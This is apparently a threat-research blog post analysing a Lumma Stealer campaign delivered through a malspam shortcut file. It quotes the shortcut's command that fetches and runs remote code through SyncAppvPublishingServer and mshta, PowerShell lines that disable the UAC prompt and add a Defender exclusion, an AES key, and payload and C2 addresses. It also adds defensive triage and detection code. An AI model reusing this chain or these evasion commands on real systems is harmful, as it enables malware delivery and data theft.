Unveiling the Exploitative Tactics: Windows SyncAppvPublishingServer Exploited in the Wild to Deploy Lumma Stealer

So, I recently came across an interesting Windows .lnk (Shortcut File) that caught my eye because it was abusing one of the Living Off the Land Binaries (LOLBINs) shipped with Windows. Let's discuss this campaign further.

5d9c44ef0226f952dd1269ba5bac9e4b0e8ada76ce7d4f6daad2fcd58521adc6 (invoice_06.23.lnk)

The file is distributed as a Windows Shortcut File with the .lnk extension. This .lnk file is in fact packed into an archive named invoice_06_23.zip that is attached to spam emails. The threat actors have gone to some lengths to lure the victim into launching the file, as the screenshot below shows.

(Fig. invoice_06.23.lnk)

This campaign is being pushed at volume via malspam with the subject line "Invoice Overdue - Please Take Action" and a zip attachment named "invoice_06_23.zip".

SyncAppvPublishingServer – LOLBIN

The target of this shortcut file is a straightforward abuse of the Windows SyncAppvPublishingServer.vbs script, with one of the arguments being a URL from which the next-stage payload is downloaded.

C:\Windows\System32\SyncAppvPublishingServer.vbs ;\W*\\\\*2\\\\m*h*a*e ('http'+'://107[.]172[.]0[.]180/invoice_06.23.'+'hta')

Interesting things to note here are:

  • ; acts as a statement terminator, so everything after it is executed as a separate command
  • \W*\\\\*2\\\\m*h*a*e is a wildcard path crafted to resolve to C:\Windows\System32\mshta.exe

This command downloads an HTA payload from 107[.]172[.]0[.]180/invoice_06.23.hta and executes it with mshta.exe.
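To check what the obfuscated wildcard token actually resolves to, here is an added Python example (it is not code from this post or from the campaign) that collapses the doubled backslashes, translates path wildcards into a regex that cannot cross a directory separator, and matches the result against a directory listing. Only the shortcut target is taken from above; the directory listing, the assumption that the root-relative path lives on C:, and the triage helper are constructed for the example, and the resolver also handles the ? wildcard, which the sample does not use.

```python
import re
from typing import Dict, List

# Constructed stand-in for a System32/SysWOW64 directory listing (not from the page);
# on a real host this would come from walking the Windows directory.
SAMPLE_LISTING = [
    r"C:\Windows\System32\mshta.exe",
    r"C:\Windows\System32\mspaint.exe",
    r"C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\cmstp.exe",
    r"C:\Windows\System32\wscript.exe",
    r"C:\Windows\SysWOW64\mshta.exe",
    r"C:\Windows\SysWOW64\cmd.exe",
]

# The shortcut target quoted in the post (URL left defanged, as on the page).
LNK_TARGET = (r"C:\Windows\System32\SyncAppvPublishingServer.vbs ;\W*\\\\*2\\\\m*h*a*e "
              r"('http'+'://107[.]172[.]0[.]180/invoice_06.23.'+'hta')")


def normalize_path_pattern(pattern: str, drive: str = "C:") -> str:
    # Runs of backslashes are equivalent to a single separator; the sample doubles them.
    collapsed = re.sub(r"\\+", r"\\", pattern)
    # A pattern starting with a separator is root-relative; C: is an assumption here.
    if collapsed.startswith("\\"):
        collapsed = drive + collapsed
    return collapsed


def wildcard_to_regex(pattern: str) -> "re.Pattern[str]":
    # '*' and '?' are path wildcards: neither crosses a separator, so each
    # segment of the path is matched on its own. Everything else is literal.
    parts = []
    for ch in pattern:
        if ch == "*":
            parts.append(r"[^\\]*")
        elif ch == "?":
            parts.append(r"[^\\]")
        else:
            parts.append(re.escape(ch))
    return re.compile("^" + "".join(parts) + "$", re.IGNORECASE)


def resolve_wildcard_path(pattern: str, listing: List[str], drive: str = "C:") -> List[str]:
    """Return every path in the listing that the wildcard pattern would match."""
    rx = wildcard_to_regex(normalize_path_pattern(pattern, drive))
    return [path for path in listing if rx.match(path)]


def triage_lnk_target(target: str, listing: List[str]) -> Dict[str, object]:
    """Split the shortcut target at the ';' terminator, take the wildcard token
    that follows it and report which binaries it resolves to."""
    script, _, tail = target.partition(";")
    tail = tail.strip()
    token = tail.split(" ", 1)[0] if tail else ""
    return {
        "abuses_syncappv": "syncappvpublishingserver.vbs" in script.lower(),
        "has_statement_break": bool(tail),
        "wildcard_token": token,
        "resolved": resolve_wildcard_path(token, listing) if token else [],
    }


if __name__ == "__main__":
    for key, value in triage_lnk_target(LNK_TARGET, SAMPLE_LISTING).items():
        print(f"{key}: {value}")
```

Running it against the constructed listing resolves the token to a single binary, C:\Windows\System32\mshta.exe; the SysWOW64 copy is excluded because the middle segment must end in 2. The same resolver can be pointed at a real directory walk when triaging other wildcard-obfuscated command lines.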

46ef08a8cd6562f5c9d246662ac348caadc17286530ef3fd9cd14c547f41fbf0 (invoice_06.23.hta)

This file contains junk HTML with a VBScript embedded in a <script> tag. The VBScript is heavily obfuscated, as the screenshot below shows.

(Fig. invoice_06.23.hta Obfuscated VBScript)

After de-obfuscating this VBScript, it becomes clear that it runs another VBScript, which in turn launches a PowerShell script, as the screenshot below shows.

(Fig. De-obfuscated VBS Running Powershell Script)

AES Encrypted Powershell Script

The PowerShell script launched by the de-obfuscated VBS carries a second PowerShell script that is encrypted with AES. The AES parameters are listed below (the 32-character key corresponds to the 256-bit key size, and the IV plays no role in ECB mode):

Key         cEyEaFkXgeAPMuvwPKCnTbsIMprryQLV
IV          0000000000000000
Mode        ECB
Block Size  128
Key Size    256

(Table. AES Configurations)


CMSTP Abuse

The decrypted PowerShell script reveals the remaining stages of the kill chain. It has two main functions:
  1. Abuse the cmstp.exe LOLBIN to achieve the following:

    • Disable the admin UAC consent prompt by modifying a registry value

      powershell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0

    • Add C:\Users\{username}\AppData\Roaming to Windows Defender exclusion list

      powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -NoProfile -ExecutionPolicy UnRestricted Add-MpPreference -ExclusionPath $env:AppData;

      The threat actors copied this cmstp abuse from a PoC published on GitHub: https://gist.github.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1

  2. Download the next-stage payload, Lumma Stealer, from the following URL and drop it in the C:\Users\{username}\AppData\Roaming directory:
    http://107[.]172[.]0[.]180/invoice.exe
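The two PowerShell command lines above are what a process-creation log will record, so they are a natural place to build detections. As an added example that is not part of the original post, the following Python applies a few rules to constructed process-creation events with Sysmon Event ID 1 style fields: the UAC admin consent value being set to 0, a Defender exclusion being added with Add-MpPreference, the hidden/no-profile/unrestricted switch combination (kept low severity because administrators use it too), and cmstp.exe spawning PowerShell. Events 1 and 2 reuse the two command lines quoted above; the other events, field names and rule names are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed process-creation events (Sysmon Event ID 1 style fields), not taken from the page.
# Events 1 and 2 reuse the command lines from the post; 3 and 4 are benign admin activity
# included to check that the rules do not over-fire.
SAMPLE_EVENTS = [
    {
        "id": 1,
        "parent": r"C:\Windows\System32\cmstp.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmd": r"powershell -NoLogo -WindowStyle hidden -NonInteractive -NoProfile "
               r"-ExecutionPolicy UnRestricted Set-ItemProperty -Path "
               r"REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System "
               r"-Name ConsentPromptBehaviorAdmin -Value 0",
    },
    {
        "id": 2,
        "parent": r"C:\Windows\System32\cmstp.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmd": r"powershell.exe -NoLogo -WindowStyle hidden -NonInteractive -NoProfile "
               r"-ExecutionPolicy UnRestricted Add-MpPreference -ExclusionPath $env:AppData;",
    },
    {
        # Administrator restoring the Windows default consent value (5) from an interactive shell.
        "id": 3,
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmd": r"powershell Set-ItemProperty -Path "
               r"REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System "
               r"-Name ConsentPromptBehaviorAdmin -Value 5",
    },
    {
        "id": 4,
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmd": r"powershell Get-MpPreference",
    },
]

# (rule name, severity, regex over the command line); rule names are constructed here.
COMMAND_LINE_RULES = [
    # ConsentPromptBehaviorAdmin set to 0 means elevation without any prompt.
    ("uac_admin_consent_disabled", "high",
     re.compile(r"ConsentPromptBehaviorAdmin\b.*?-Value\s+0(?!\d)", re.IGNORECASE)),
    # A Defender exclusion path added from the command line.
    ("defender_exclusion_added", "high",
     re.compile(r"Add-MpPreference\b.*?-ExclusionPath\b", re.IGNORECASE)),
    # Switch combination typical of scripted droppers; noisy on its own, so low severity.
    ("powershell_stealth_switches", "low",
     re.compile(r"-WindowStyle\s+hidden\b.*?-ExecutionPolicy\s+Unrestricted\b", re.IGNORECASE)),
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_event(event: Dict[str, object]) -> List[Dict[str, str]]:
    """Return the rules an event triggers, in rule order, with their severities."""
    hits = []
    for name, severity, rx in COMMAND_LINE_RULES:
        if rx.search(str(event["cmd"])):
            hits.append({"rule": name, "severity": severity})
    # Parent/child check: cmstp.exe launching PowerShell is the elevation path described above.
    if _basename(str(event["parent"])) == "cmstp.exe" and _basename(str(event["image"])) == "powershell.exe":
        hits.append({"rule": "cmstp_spawned_powershell", "severity": "high"})
    return hits


def scan(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map event id to the names of the rules it triggered; events with no hits are omitted."""
    report: Dict[int, List[str]] = {}
    for event in events:
        hits = evaluate_event(event)
        if hits:
            report[int(event["id"])] = [hit["rule"] for hit in hits]
    return report


if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Events 1 and 2 each trigger a high-severity rule plus the cmstp parent/child rule, while the benign events 3 and 4 produce no hits. In a SIEM the same logic maps onto the process command line and parent image fields; the high-severity rules are worth alerting on alone, and the stealth switch rule is best used to raise the score of other hits rather than to alert by itself.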

06810a7d576fc02e44a135364d1b17014081be39675bdb4b48f87799dbacf471 (invoice.exe)

This final payload is Lumma Stealer, which harvests sensitive victim information and sends it back to its C2 at gservice-node[.]io. This sample is LummaC2 Build 20233101.
